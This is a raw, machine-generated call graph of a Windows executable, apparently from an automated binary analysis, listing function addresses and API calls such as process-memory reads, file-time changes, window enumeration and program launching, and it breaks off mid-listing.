4542->4340 4543 140006ff9 MessageBoxA 4543->4542 4544->4319 4546 140006694 memset 4545->4546 4547 1400065de memset GetModuleHandleA RegisterClassA CreateWindowExA 4545->4547 4548 1400029dc strlen 4546->4548 4547->4546 4549 140002a03 memcpy 4548->4549 4550 140002a00 4548->4550 4549->4335 4550->4549 4552 140013d39 Shell_NotifyIconA 4551->4552 4553 140013d2c Shell_NotifyIconA 4551->4553 4554 140011367 4552->4554 4553->4554 4554->4347 4556 1400029dc 2 API calls 4555->4556 4557 140013e78 4556->4557 4558 1400029dc 2 API calls 4557->4558 4559 140013e8e Shell_NotifyIconA 4558->4559 4559->4354 4561 140013d72 Shell_NotifyIconA 4560->4561 4562 14001141f 4560->4562 4561->4562 4562->4361 4562->4362 4563->4276 4564->4185 4565->4198 4566->4205 4568 140013fc0 18 API calls 4567->4568 4573 14000aacc 4568->4573 4569 14000ab89 CoUninitialize MessageBoxA 4732 1400038d0 4569->4732 4571 140013fc0 18 API calls 4571->4573 4573->4569 4573->4571 4574 14000aafe memset WideCharToMultiByte 4573->4574 4576 14000396c 6 API calls 4573->4576 4577 14000ab84 4573->4577 4725 14000396c 4574->4725 4576->4573 4577->4569 4579 14001448e 4578->4579 4580 1400144ab wcscpy 4579->4580 4581 1400144e0 4579->4581 4582 1400144d7 CoTaskMemFree 4580->4582 4583 1400144c0 4580->4583 4585 14001457e memcmp 4581->4585 4586 14001450d memcmp 4581->4586 4582->4581 4583->4582 4584 1400144c6 wcscpy 4583->4584 4584->4582 4600 140014599 4585->4600 4587 140014532 memcmp 4586->4587 4588 140014528 4586->4588 4587->4585 4590 14001454d 4587->4590 4588->4587 4589 140014628 memcmp 4592 140014643 4589->4592 4593 1400146ba 4589->4593 4590->4585 4591 140014554 memcpy 4590->4591 4591->4585 4594 140014656 4592->4594 4595 14001464c wcscpy 4592->4595 4593->4411 4594->4593 4597 140002a2c 3 API calls 4594->4597 4595->4594 4596 14001461d 4596->4589 4598 140014688 memcpy 4597->4598 4598->4593 4600->4589 4600->4596 4601 140014444 3 API calls 4600->4601 4601->4600 4604 1400140f0 4602->4604 4603 1400142a8 4612 1400142cc 4603->4612 4604->4603 4605 140014162 memset 4604->4605 4607 140014282 CoTaskMemFree 4604->4607 4608 14001403c wcslen memcpy memset PropVariantClear 4604->4608 4610 140002a2c 3 API calls 4604->4610 4611 140014253 memcpy 4604->4611 4619 140014a1c 4604->4619 4618 140013fe8 wcslen memcpy 4605->4618 4607->4604 4608->4604 4610->4604 4611->4604 4614 140014300 4612->4614 4613 140014428 4613->4430 4614->4613 4615 140014356 wcscmp 4614->4615 4617 140014370 CoTaskMemFree 4614->4617 4615->4614 4615->4617 4617->4613 4618->4604 4620 140014a82 memset 4619->4620 4621 140014a43 4619->4621 4630 140013fe8 wcslen memcpy 4620->4630 4621->4620 4623 140014a64 wcscmp 4621->4623 4623->4621 4626 140014b1f 4623->4626 4624 140014ab3 memcpy 4625 140014adc 4624->4625 4624->4626 4627 140002a2c 3 API calls 4625->4627 4626->4604 4628 140014af4 memcpy 4627->4628 4628->4626 4630->4624 4632 140014c14 4631->4632 4634 1400149bc 4631->4634 4633 140014c35 _wcsicmp 4632->4633 4632->4634 4633->4632 4634->4435 4634->4436 4638 14000292c strlen 4635->4638 4637 140002c63 strcat 4637->4459 4639 14000293e 4638->4639 4639->4637 4641 140001e91 FreeLibrary 4640->4641 4642 140001e97 LoadLibraryA 4640->4642 4641->4642 4643 140001eb9 GetProcAddress 4642->4643 4649 140001f1c 4642->4649 4645 140001ed3 4643->4645 4643->4649 4644 140001e3c 2 API calls 4648 140001f4d 4644->4648 4646 140001ee2 4645->4646 4647 140001edc FreeLibrary 4645->4647 4646->4649 4650 140001f07 GetProcAddress 4646->4650 4647->4646 4648->4475 4648->4476 4649->4644 4649->4648 4650->4649 4652 140001e54 4651->4652 4653 140001e4e FreeLibrary 4651->4653 4654 140001e66 FreeLibrary 4652->4654 4655 140001e6c 4652->4655 4653->4652 4654->4655 4655->4476 4662 140002270 4656->4662 4659 1400022cc 4660 140002060 11 API calls 4659->4660 4661 1400022e1 4660->4661 4661->4487 4663 140002060 11 API calls 4662->4663 4664 14000228d 4663->4664 4666 1400022a4 4664->4666 4667 140002304 memset 4664->4667 4666->4659 4670 140002363 4667->4670 4668 140002425 4669 140002060 11 API calls 4668->4669 4671 14000243d 4669->4671 4670->4668 4672 140002382 wcscpy 4670->4672 4673 140002393 _wcsicmp 4670->4673 4676 140002464 malloc 4671->4676 4677 1400024d5 4671->4677 4672->4673 4674 1400023a6 _wcsicmp 4673->4674 4675 1400023b9 wcscpy 4673->4675 4674->4675 4679 1400023ca _wcsicmp 4674->4679 4675->4679 4676->4677 4678 140002474 4676->4678 4677->4666 4680 140002060 11 API calls 4678->4680 4681 1400023dd _wcsicmp 4679->4681 4682 1400023f0 wcscpy 4679->4682 4688 14000248a 4680->4688 4681->4682 4683 140002401 _wcsicmp 4681->4683 4682->4683 4683->4668 4684 140002414 wcscpy 4683->4684 4684->4668 4685 1400024cd free 4685->4677 4686 1400024ac wcscmp 4687 1400024f2 free 4686->4687 4686->4688 4687->4677 4688->4685 4688->4686 4690 140002bb0 GetVersionExA 4689->4690 4691 140012135 4690->4691 4692 140012142 4691->4692 4693 14001213b 4691->4693 4707 140011f54 4692->4707 4697 140012040 4693->4697 4696 140009000 EnumWindows 4698 140012123 4697->4698 4699 140012053 LoadLibraryA 4697->4699 4698->4696 4699->4698 4700 14001206c GetProcAddress 4699->4700 4701 14001208c GetProcAddress 4700->4701 4702 140012110 4700->4702 4701->4702 4703 1400120a8 GetProcAddress 4701->4703 4702->4698 4705 14001211a FreeLibrary 4702->4705 4703->4702 4704 1400120c4 GetProcAddress 4703->4704 4704->4702 4706 1400120e0 GetProcAddress 4704->4706 4705->4698 4706->4702 4708 140012037 4707->4708 4709 140011f67 LoadLibraryA 4707->4709 4708->4696 4709->4708 4710 140011f80 GetProcAddress 4709->4710 4711 140011fa0 GetProcAddress 4710->4711 4713 140012024 4710->4713 4712 140011fbc GetProcAddress 4711->4712 4711->4713 4712->4713 4714 140011fd8 GetProcAddress 4712->4714 4713->4708 4715 14001202e FreeLibrary 4713->4715 4714->4713 4716 140011ff4 GetProcAddress 4714->4716 4715->4708 4716->4713 4718 140002817 FormatMessageA 4717->4718 4719 1400027f8 LoadLibraryExA 4717->4719 4720 140002841 strlen 4718->4720 4721 14000286d strcpy 4718->4721 4719->4718 4722 140002853 strcpy 4720->4722 4723 140002860 LocalFree 4720->4723 4724 14000287c sprintf 4721->4724 4722->4723 4723->4724 4724->4542 4724->4543 4726 140003996 4725->4726 4728 140003991 4725->4728 4726->4728 4729 14000399e strlen 4726->4729 4727 1400039aa strlen 4730 140002a2c 3 API calls 4727->4730 4728->4727 4729->4727 4731 1400039d3 memcpy 4730->4731 4731->4573 4733 1400038e1 free 4732->4733 4734 1400038ea 4732->4734 4733->4734 4734->4108 4735 140011c7c 4736 140011d76 4735->4736 4737 140011c8e 9 API calls 4735->4737 4737->4736 4738 140015e7b 4739 140015e87 _exit 4738->4739 4740 140015e90 _c_exit 4738->4740 4739->4740 4741 140015e97 4740->4741 4747 140004400 GetMonitorInfoA 4748 140004433 4747->4748 4749 140004477 4747->4749 4750 140002a2c 3 API calls 4748->4750 4751 14000444e memcpy 4750->4751 4751->4749 4753 140001000 4754 14000127c 7 API calls 4753->4754 4755 14000102c 4753->4755 4776 140002d28 6 API calls 4754->4776 4756 140001039 4755->4756 4757 140001150 4755->4757 4759 140001111 GetDlgItem 4756->4759 4760 140001042 4756->4760 4762 140001183 4757->4762 4763 14000115d 4757->4763 4761 1400010b5 4759->4761 4766 140001125 SetBkMode SetTextColor GetSysColorBrush 4759->4766 4764 14000104a 4760->4764 4765 1400010bd ChildWindowFromPoint GetDlgItem 4760->4765 4762->4761 4770 14000119a memcpy MessageBoxA 4762->4770 4763->4761 4767 140001168 EndDialog DeleteObject 4763->4767 4764->4761 4768 140001053 ChildWindowFromPoint GetDlgItem 4764->4768 4765->4761 4769 1400010f4 LoadCursorA SetCursor 4765->4769 4766->4761 4767->4761 4768->4761 4772 14000108a ShellExecuteA 4768->4772 4769->4761 4770->4761 4771 1400011d8 memset GetWindowsDirectoryA 4770->4771 4773 14000292c strlen 4771->4773 4772->4761 4774 140001215 strcat GetModuleFileNameA CopyFileA 4773->4774 4774->4761 4775 14000125d MessageBoxA 4774->4775 4775->4761 4776->4761 4777 14000a400 4792 14000288c CreateFileA 4777->4792 4779 14000a424 4780 14000a4a4 4779->4780 4781 14000a42d GetFileSize 4779->4781 4782 140006f98 9 API calls 4780->4782 4783 14000a446 ??2@YAPEAX_K ReadFile 4781->4783 4784 14000a499 CloseHandle 4781->4784 4785 14000a4ae 4782->4785 4786 14000a487 4783->4786 4787 14000a46f 4783->4787 4784->4785 4788 140006f98 9 API calls 4786->4788 4793 140002ad4 4787->4793 4790 14000a491 ??3@YAXPEAX 4788->4790 4790->4784 4792->4779 4796 140002b14 4793->4796 4794 140002b8b 4794->4790 4795 140002b41 memcpy 4795->4796 4796->4794 4796->4795 4797 140008700 strlen 4798 140008759 _stricmp 4797->4798 4799 14000872e 4797->4799 4800 14000873c 4798->4800 4801 140008775 _stricmp 4798->4801 4799->4798 4799->4800 4801->4800 4802 140008791 _stricmp 4801->4802 4802->4800 4803 1400087ad _stricmp 4802->4803 4803->4800 4804 1400087c9 _stricmp 4803->4804 4804->4800 4805 1400087e5 _stricmp 4804->4805 4805->4800 4806 140008801 _stricmp 4805->4806 4806->4800 4807 14000881d _stricmp 4806->4807 4807->4800 4808 140008839 _stricmp 4807->4808 4808->4800 4809 140008855 _stricmp 4808->4809 4809->4800 4810 140008871 _stricmp 4809->4810 4810->4800 4811 14000888d _stricmp 4810->4811 4811->4800 4812 1400088a9 _stricmp 4811->4812 4812->4800 4813 1400088c5 _stricmp 4812->4813 4813->4800 4814 1400088e1 _stricmp 4813->4814 4814->4800 4815 1400088fd _stricmp 4814->4815 4815->4800 4816 140008919 _stricmp 4815->4816 4816->4800 4817 140008935 _stricmp 4816->4817 4817->4800 4818 140008951 _stricmp 4817->4818 4818->4800 4819 14000896d _stricmp 4818->4819 4819->4800 4820 140008989 _stricmp 4819->4820 4820->4800 4821 1400089a5 _stricmp 4820->4821 4821->4800 4822 1400089c1 _stricmp 4821->4822 4822->4800 4823 1400089dd _stricmp 4822->4823 4823->4800 4824 1400089f9 _stricmp 4823->4824 4824->4800 4825 140008a15 _stricmp 4824->4825 4825->4800 4826 140008a31 _stricmp 4825->4826 4826->4800 4827 140008a4d _stricmp 4826->4827 4827->4800 4828 140008a69 _stricmp 4827->4828 4828->4800 4829 140008a85 _stricmp 4828->4829 4829->4800 4830 140008a9c _stricmp 4829->4830 4830->4800 4831 140008ab8 _stricmp 4830->4831 4831->4800 4832 140008ad4 _stricmp 4831->4832 4832->4800 4833 140008af0 _stricmp 4832->4833 4833->4800 4834 140008b0c _stricmp 4833->4834 4834->4800 4835 140008b28 _stricmp 4834->4835 4835->4800 4836 140008b43 _stricmp 4835->4836 4836->4800 4837 140008b5f _stricmp 4836->4837 4837->4800 4838 140008b7b _stricmp 4837->4838 4838->4800 4839 140008b97 _stricmp 4838->4839 4839->4800 4840 140008bb0 _stricmp 4839->4840 4840->4800 4841 140008bc9 _stricmp 4840->4841 4841->4800 4842 140008be2 4841->4842 4843 140008bfc 4842->4843 4844 140008c09 atoi 4842->4844 4845 1400031d8 5 API calls 4843->4845 4844->4800 4845->4800 4846 140002c80 strcpy strrchr 4847 140002cb1 FindFirstFileA 4846->4847 4849 140002d12 4847->4849 4850 140002cd4 4847->4850 4852 140002d02 FindClose 4850->4852 4853 140002ced FindNextFileA 4850->4853 4854 140007728 memset strcmp 4850->4854 4852->4849 4853->4850 4853->4852 4855 140007816 4854->4855 4856 140007786 strcmp 4854->4856 4855->4850 4856->4855 4857 140007799 strlen strlen 4856->4857 4858 1400077ba 4857->4858 4860 1400077ca 4857->4860 4859 140002c40 3 API calls 4858->4859 4859->4860 4860->4855 4862 1400074bc _stricmp 4860->4862 4863 140007519 4862->4863 4864 1400074f9 GetSystemTime SystemTimeToFileTime 4862->4864 4879 140007314 strlen memset 4863->4879 4865 14000752c _stricmp 4864->4865 4868 140007568 4865->4868 4869 14000754b GetSystemTime SystemTimeToFileTime 4865->4869 4871 140007314 16 API calls 4868->4871 4870 140007578 _stricmp 4869->4870 4873 1400075b6 4870->4873 4874 140007599 GetSystemTime SystemTimeToFileTime 4870->4874 4871->4870 4876 140007314 16 API calls 4873->4876 4875 1400075cb 4874->4875 4885 140003040 4875->4885 4876->4875 4880 140007357 6 API calls 4879->4880 4881 14000749f 4879->4881 4882 1400073d9 4880->4882 4881->4865 4883 140007474 SystemTimeToFileTime LocalFileTimeToFileTime 4882->4883 4884 1400073f0 6 API calls 4882->4884 4883->4881 4884->4883 4886 140003081 CreateFileA 4885->4886 4887 140003071 GetFileAttributesA 4885->4887 4888 1400030cd 4886->4888 4889 1400030b0 SetFileTime CloseHandle 4886->4889 4887->4886 4888->4855 4889->4888 4890 140008480 4891 14001212c 15 API calls 4890->4891 4892 1400084ab 4891->4892 4893 1400084b3 memset memset 4892->4893 4894 1400086c3 4892->4894 4922 140006f0c 4893->4922 4896 140006f64 MessageBoxA 4894->4896 4898 1400086c1 4896->4898 4897 1400084f9 4899 140006f0c _stricmp 4897->4899 4900 140008519 4899->4900 4901 140006f0c _stricmp 4900->4901 4902 140008533 4901->4902 4903 14000855e 4902->4903 4904 140002df4 2 API calls 4902->4904 4926 1400125e0 4903->4926 4904->4903 4907 140008593 memcpy 4907->4894 4908 1400085b7 memset strcpy 4907->4908 4909 140002df4 2 API calls 4908->4909 4910 1400085f9 4909->4910 4911 140002df4 2 API calls 4910->4911 4912 14000860d 4911->4912 4913 14000861f 4912->4913 4914 140002df4 2 API calls 4912->4914 4939 140012368 4913->4939 4914->4913 4917 140008662 memcpy 4918 14000867c 4917->4918 4955 140006244 OpenProcess 4918->4955 4921 140006f98 9 API calls 4921->4898 4923 140006f2b _stricmp 4922->4923 4925 140006f4c 4922->4925 4924 140006f41 4923->4924 4923->4925 4924->4923 4924->4925 4925->4897 4927 1400125fa 4926->4927 4928 140002bb0 GetVersionExA 4927->4928 4929 140012608 4928->4929 4930 140012623 memset 4929->4930 4937 1400126e8 4929->4937 4935 14001265d 4930->4935 4931 140008586 4931->4894 4931->4907 4933 14001271a strcpy 4933->4937 4934 14001275c CloseHandle 4934->4931 4935->4931 4936 1400126b1 strcpy 4935->4936 4970 14001223c 4935->4970 4981 140012164 strchr 4935->4981 4936->4935 4937->4931 4937->4933 4937->4934 4940 140012386 4939->4940 4941 140002bb0 GetVersionExA 4940->4941 4942 140012396 4941->4942 4943 1400123ac OpenProcess 4942->4943 4950 1400124e6 4942->4950 4944 140008659 4943->4944 4952 1400123c8 4943->4952 4944->4917 4944->4918 4945 1400125b8 CloseHandle 4945->4944 4946 14001240d memset memset 4946->4952 4947 140012531 memset strcpy 4948 1400128e8 7 API calls 4947->4948 4948->4950 4949 140012478 strcpy 4949->4952 4950->4944 4950->4945 4950->4947 4951 140012164 9 API calls 4951->4952 4952->4945 4952->4946 4952->4949 4952->4951 4954 1400124e1 4952->4954 4993 1400128e8 4952->4993 4954->4945 4956 140006286 4955->4956 4957 1400063ad GetLastError 4955->4957 4998 1400028bc CreateFileA 4956->4998 4958 1400063b5 4957->4958 4958->4898 4958->4921 4960 140006290 4961 14000639a GetLastError 4960->4961 4962 14000629d ??2@YAPEAX_K 4960->4962 4963 1400063a2 CloseHandle 4961->4963 4964 140006387 ??3@YAXPEAX CloseHandle 4962->4964 4966 1400062cb 4962->4966 4963->4958 4964->4963 4965 1400062f4 ReadProcessMemory 4965->4966 4966->4965 4967 14000632b WriteFile 4966->4967 4969 140006382 4966->4969 4999 140002e20 ??2@YAPEAX_K ??2@YAPEAX_K 4966->4999 4967->4966 4969->4964 4971 140012256 4970->4971 4972 140002bb0 GetVersionExA 4971->4972 4973 140012268 4972->4973 4974 140012274 4973->4974 4979 1400122fd 4973->4979 4975 1400122e2 4974->4975 4976 14001227c OpenProcess 4974->4976 4975->4935 4976->4975 4978 140012294 CloseHandle 4976->4978 4978->4975 4979->4975 4979->4978 4980 140012347 strcpy CloseHandle 4979->4980 4980->4975 4982 140012198 4981->4982 4983 14001218f strcpy 4981->4983 4991 140002960 strlen strlen 4982->4991 4987 140012222 4983->4987 4986 1400121a7 4986->4983 4988 1400121ad memset 4986->4988 4987->4935 4989 1400121e5 strcpy strcpy strcat 4988->4989 4990 1400121cd GetWindowsDirectoryA 4988->4990 4989->4987 4990->4989 4992 14000299a 4991->4992 4992->4986 4994 140012788 6 API calls 4993->4994 4995 1400128fd 4994->4995 4996 140012901 memcpy 4995->4996 4997 140012924 4995->4997 4996->4997 4997->4952 4998->4960 5000 140002f9d ??3@YAXPEAX ??3@YAXPEAX 4999->5000 5004 140002e79 4999->5004 5000->4966 5001 140002eac sprintf memcpy 5001->5004 5002 140002e8c sprintf 5002->5001 5003 140002f1b memset 5003->5004 5004->5000 5004->5001 5004->5002 5004->5003 5005 1400028ec strlen WriteFile 5004->5005 5005->5004 5006 14000a180 memset 5007 14000a1d3 _stricmp 5006->5007 5008 14000a1cb atoi 5006->5008 5009 14000a201 _stricmp 5007->5009 5010 14000a1fc 5007->5010 5008->5007 5009->5010 5011 14000a23a 5010->5011 5030 140006000 memset 5010->5030 5013 14000a275 5011->5013 5015 140007a34 17 API calls 5011->5015 5014 1400029dc 2 API calls 5013->5014 5016 14000a292 GetFileAttributesA 5014->5016 5017 14000a263 5015->5017 5018 14000a2a2 5016->5018 5019 14000a2ac CoInitialize 5016->5019 5017->5013 5020 14000a267 5017->5020 5047 140002be0 strcpy 5018->5047 5022 14000a2c4 5019->5022 5023 140013bc0 10 API calls 5020->5023 5052 140003d78 memset strcpy 5022->5052 5024 14000a273 5023->5024 5024->5016 5027 14000a369 5028 14000a35a 5029 140006f64 MessageBoxA 5028->5029 5029->5027 5045 140006045 5030->5045 5031 140006093 strcpy 5033 14000609d _stricmp 5031->5033 5032 14000607a memcpy 5032->5033 5034 1400060bc _stricmp 5033->5034 5033->5045 5035 1400060db _stricmp 5034->5035 5034->5045 5037 1400060fa _stricmp 5035->5037 5035->5045 5036 14000621f 5036->5011 5038 140006119 _stricmp 5037->5038 5037->5045 5039 140006137 _stricmp 5038->5039 5038->5045 5040 140006155 _stricmp 5039->5040 5039->5045 5041 140006173 _stricmp 5040->5041 5040->5045 5042 140006191 _stricmp 5041->5042 5041->5045 5043 1400061ac _stricmp 5042->5043 5042->5045 5044 1400061c7 _stricmp 5043->5044 5043->5045 5044->5045 5045->5031 5045->5032 5045->5036 5046 1400061fa atoi 5045->5046 5046->5045 5048 140002c08 5047->5048 5049 140002c2a CreateDirectoryA 5048->5049 5050 140002c0d GetFileAttributesA 5048->5050 5049->5019 5050->5049 5051 140002c20 5050->5051 5051->5049 5053 140003df9 strlen strlen 5052->5053 5054 140003dd9 strchr 5052->5054 5056 140003e37 strcat 5053->5056 5057 140003e1f 5053->5057 5055 140003ded 5054->5055 5055->5053 5055->5054 5060 140003e67 strcpy strrchr 5056->5060 5061 140003e8e strcpy 5056->5061 5058 140002c40 3 API calls 5057->5058 5058->5056 5063 140003e83 5060->5063 5062 140003e93 CoCreateInstance 5061->5062 5064 140003ec4 5062->5064 5066 140003fce CoUninitialize 5062->5066 5063->5062 5065 140003f8a MultiByteToWideChar 5064->5065 5064->5066 5065->5066 5066->5027 5066->5028 5067 140004104 memset strlen 5068 140004172 5067->5068 5069 1400041a8 strcpy 5067->5069 5068->5069 5071 14000417f strchr 5068->5071 5070 14000292c strlen 5069->5070 5072 1400041c3 strcat strcat 5070->5072 5071->5068 5073 14000b304 5074 14000b2d9 5073->5074 5075 14000b29b MessageBoxA 5073->5075 5075->5074 5076 14000b19a 5075->5076 5076->5074 5076->5075 5077 14000b17d _stricmp 5076->5077 5078 14000b1a1 _stricmp 5076->5078 5080 14000b1fe _stricmp 5076->5080 5081 14000b22c _stricmp 5076->5081 5082 14000b250 _stricmp 5076->5082 5083 140002df4 2 API calls 5076->5083 5084 14000b274 _stricmp 5076->5084 5077->5076 5077->5078 5079 14000b1b8 _stricmp 5078->5079 5079->5076 5079->5080 5080->5076 5080->5081 5081->5076 5081->5082 5082->5076 5082->5084 5085 14000b1eb Sleep 5083->5085 5084->5076 5085->5080 5086 140004784 _mbsicmp 5087 140004813 memset strlen 5086->5087 5088 1400047b6 5086->5088 5091 140004838 5087->5091 5089 140004878 _mbsicmp 5089->5088 5090 14000488a _mbsicmp 5089->5090 5090->5088 5090->5091 5091->5088 5091->5089 5091->5090 5092 140013188 memset GetClassNameA _stricmp 5093 1400131db 5092->5093 5094 1400131df _stricmp 5092->5094 5093->5094 5095 1400131f4 5094->5095 5096 140007608 memset 5097 1400029dc 2 API calls 5096->5097 5098 140007658 5097->5098 5111 140012e48 5098->5111 5101 1400029dc 2 API calls 5102 140007687 5101->5102 5103 1400029dc 2 API calls 5102->5103 5104 14000769d 5103->5104 5105 1400029dc 2 API calls 5104->5105 5106 1400076b8 5105->5106 5107 1400029dc 2 API calls 5106->5107 5108 1400076d3 5107->5108 5109 1400076f1 5108->5109 5115 140012d2c 5108->5115 5112 140007674 5111->5112 5113 140012e6e 5111->5113 5112->5101 5114 140012d2c 8 API calls 5113->5114 5114->5112 5116 140012d4c LoadLibraryA 5115->5116 5117 140012d40 FreeLibrary 5115->5117 5118 140012d61 6 API calls 5116->5118 5119 140012dd9 5116->5119 5117->5116 5118->5119 5119->5109 5120 140005788 IsWindowVisible 5121 1400057d4 5120->5121 5122 1400057a0 GetWindowThreadProcessId 5120->5122 5122->5121 5123 1400057bc 5122->5123 5123->5121 5124 1400057c1 PostMessageA 5123->5124 5124->5121 5125 14000a388 5127 14000a392 5125->5127 5126 14000a3f1 5127->5126 5135 140003758 free free 5127->5135 5129 14000a3c4 5136 140003758 free free 5129->5136 5131 14000a3d1 5137 140003758 free free 5131->5137 5133 14000a3de 5133->5126 5134 14000a3eb FreeLibrary 5133->5134 5134->5126 5135->5129 5136->5131 5137->5133 5138 14000400c CoCreateInstance 5139 1400040e5 CoUninitialize 5138->5139 5140 140004052 5138->5140 5141 1400040c7 5140->5141 5142 14000408e MultiByteToWideChar 5140->5142 5141->5139 5142->5141 5143 14000a88c CoInitialize _stricmp 5144 14000a8d7 5143->5144 5164 14000a91d 5143->5164 5147 140013fc0 18 API calls 5144->5147 5145 14000aa26 5149 1400159dc CoCreateInstance 5145->5149 5146 14000a938 _stricmp _stricmp 5146->5145 5150 14000a96e GetForegroundWindow 5146->5150 5148 14000a8dc MultiByteToWideChar 5147->5148 5151 140013fc0 18 API calls 5148->5151 5152 14000aa11 5149->5152 5153 14000a98c 5150->5153 5154 14000a97e GetWindowThreadProcessId 5150->5154 5155 14000a906 5151->5155 5158 1400155b8 40 API calls 5152->5158 5156 1400159dc CoCreateInstance 5153->5156 5154->5153 5157 140014be8 _wcsicmp 5155->5157 5159 14000a991 5156->5159 5161 14000a918 5157->5161 5162 14000aa55 5158->5162 5173 1400155b8 5159->5173 5161->5164 5167 1400031d8 5 API calls 5161->5167 5165 1400159dc CoCreateInstance 5162->5165 5163 14000a9bd 5163->5162 5166 14000a9c5 GetForegroundWindow 5163->5166 5164->5145 5164->5146 5168 14000aa5a CoUninitialize 5165->5168 5170 14000aa08 5166->5170 5171 14000a9df GetWindowThreadProcessId EnumChildWindows 5166->5171 5167->5164 5170->5162 5172 1400159dc CoCreateInstance 5170->5172 5171->5170 5172->5152 5176 140015138 5173->5176 5175 1400155d1 5175->5163 5177 14001212c 15 API calls 5176->5177 5178 14001515e 5177->5178 5179 140013fc0 18 API calls 5178->5179 5180 140015189 5178->5180 5181 140015169 5178->5181 5179->5180 5180->5181 5182 14001523b 5180->5182 5185 140015353 5180->5185 5181->5175 5182->5181 5186 140015088 5182->5186 5184 140015088 8 API calls 5184->5185 5185->5181 5185->5184 5187 14001511c 5186->5187 5188 1400150a5 5186->5188 5187->5182 5188->5187 5189 1400150af memset 5188->5189 5190 14001223c 5 API calls 5189->5190 5191 1400150d3 5190->5191 5191->5187 5192 1400150d9 _mbsicmp 5191->5192 5192->5187 5194 1400150ea _mbsicmp 5192->5194 5194->5187 5195 14000718c 5196 1400071b2 5195->5196 5203 140012dec 5196->5203 5198 1400072f8 ??3@YAXPEAX 5199 1400071fe LoadLibraryA 5200 14000721b 6 API calls 5199->5200 5201 1400071d4 5199->5201 5200->5201 5201->5198 5201->5199 5207 140007050 5201->5207 5204 140012e12 5203->5204 5205 140012e17 5203->5205 5206 140012d2c 8 API calls 5204->5206 5205->5201 5206->5205 5212 14000706a 5207->5212 5208 140007080 LoadLibraryA 5209 14000709d 6 API calls 5208->5209 5208->5212 5209->5212 5210 140007175 5210->5201 5211 14000715b Sleep 5211->5210 5211->5212 5212->5208 5212->5210 5212->5211 5213 140013210 memset GetClassNameA _stricmp 5214 14001327f 5213->5214 5215 140013263 EnumChildWindows 5213->5215 5215->5214 5216 140004490 5217 1400044b9 free 5216->5217 5218 1400044be EnumDisplayMonitors 5216->5218 5217->5218 5219 1400044e6 free 5218->5219 5220 1400044eb memset memset 5218->5220 5219->5220 5221 14000474b EnumDisplayDevicesA 5220->5221 5222 140004767 5221->5222 5223 140004540 EnumDisplayDevicesA memcpy memcpy 5221->5223 5233 140004330 memset EnumDisplaySettingsA 5223->5233 5225 140004330 3 API calls 5227 140004620 5225->5227 5226 140002a2c 3 API calls 5226->5227 5227->5221 5227->5225 5227->5226 5228 140004674 memset 5227->5228 5230 140004726 memcpy 5227->5230 5229 1400029dc 2 API calls 5228->5229 5231 14000469d _mbsicmp 5229->5231 5230->5227 5231->5227 5232 1400046b4 memcpy 5231->5232 5232->5227 5234 1400043e1 GetLastError 5233->5234 5235 140004399 5233->5235 5234->5235 5235->5227 5236 140007d90 5237 140012788 6 API calls 5236->5237 5238 140007dbc 5237->5238 5240 140007dc7 5238->5240 5241 140012994 EnumWindows 5238->5241 5242 1400129ec 5241->5242 5243 1400129ce EnumWindows 5241->5243 5242->5240 5243->5242 5244 140009e98 memset 5245 140009ee4 5244->5245 5246 140009f0d 5244->5246 5247 140007a34 17 API calls 5245->5247 5248 1400029dc 2 API calls 5246->5248 5249 140009efb 5247->5249 5259 140009f0b 5248->5259 5249->5246 5251 140009eff 5249->5251 5250 140009f4d GetFileAttributesA 5253 140009f67 CoInitialize memset GetModuleFileNameA 5250->5253 5254 140009f5d 5250->5254 5255 140013bc0 10 API calls 5251->5255 5252 140006000 15 API calls 5256 140009f4a 5252->5256 5258 140003d78 14 API calls 5253->5258 5257 140002be0 3 API calls 5254->5257 5255->5259 5256->5250 5257->5253 5260 140009fe4 CoUninitialize 5258->5260 5259->5250 5259->5252 5261 140009fff 5260->5261 5262 140009ff0 5260->5262 5263 140006f64 MessageBoxA 5262->5263 5263->5261 5264 14001361c 5281 1400132a8 EnumWindows 5264->5281 5267 140013654 5269 1400132a8 EnumWindows 5267->5269 5268 140013644 WinExec 5268->5267 5270 14001365c 5269->5270 5271 140013664 GetWindowLongA 5270->5271 5278 14001370b 5270->5278 5272 140013686 SetForegroundWindow 5271->5272 5273 140013678 ShowWindow 5271->5273 5283 140013490 5272->5283 5273->5272 5276 1400136c8 GetCurrentThreadId GetWindowThreadProcessId AttachThreadInput 5277 1400136f5 SetFocus AttachThreadInput 5276->5277 5276->5278 5277->5278 5279 1400136aa 5279->5276 5301 14001335c 5279->5301 5282 1400132d7 5281->5282 5282->5267 5282->5268 5284 1400134b9 5283->5284 5285 1400135f5 Sleep 5283->5285 5284->5285 5286 1400134cf strchr 5284->5286 5285->5276 5285->5279 5287 1400135e3 5286->5287 5288 1400134e8 5286->5288 5289 1400133d8 4 API calls 5287->5289 5288->5287 5290 1400134fd strlen ??2@YAPEAX_K _memicmp 5288->5290 5289->5285 5291 140013532 _memicmp 5290->5291 5292 140013529 strcpy 5290->5292 5291->5292 5294 140013551 _memicmp 5291->5294 5295 1400135bc strcat 5292->5295 5294->5292 5296 140013570 _memicmp 5294->5296 5306 1400133d8 5295->5306 5296->5292 5297 14001358f _memicmp 5296->5297 5297->5292 5299 1400135b9 5297->5299 5299->5295 5302 140013387 5301->5302 5303 14001337f strlen 5301->5303 5304 1400133bf 5302->5304 5305 14001339e SendMessageA 5302->5305 5303->5302 5304->5276 5305->5302 5305->5304 5314 1400132f8 5306->5314 5309 1400132f8 2 API calls 5312 14001341d 5309->5312 5310 14001335c 2 API calls 5310->5312 5311 140013474 ??3@YAXPEAX 5311->5285 5312->5310 5312->5311 5313 1400132f8 2 API calls 5312->5313 5313->5312 5315 140013311 5314->5315 5316 14001334b 5314->5316 5317 140013317 SendMessageA SendMessageA 5315->5317 5316->5309 5317->5316 5317->5317 5318 14001389c 5319 1400138c9 5318->5319 5320 1400138d1 5319->5320 5321 140013948 GetLastError 5319->5321 5322 140013935 GetLastError 5320->5322 5324 1400138e9 5320->5324 5323 14001392a 5321->5323 5322->5323 5324->5323 5325 140013922 GetLastError 5324->5325 5325->5323 5326 14000a01c memset 5327 14000a092 5326->5327 5328 14000a069 5326->5328 5330 1400029dc 2 API calls 5327->5330 5329 140007a34 17 API calls 5328->5329 5331 14000a080 5329->5331 5332 14000a0ac GetFileAttributesA 5330->5332 5331->5327 5333 14000a084 5331->5333 5334 14000a0c6 CoInitialize memset GetModuleFileNameA 5332->5334 5335 14000a0bc 5332->5335 5337 140013bc0 10 API calls 5333->5337 5336 140003d78 14 API calls 5334->5336 5338 140002be0 3 API calls 5335->5338 5339 14000a144 CoUninitialize 5336->5339 5340 14000a090 5337->5340 5338->5334 5341 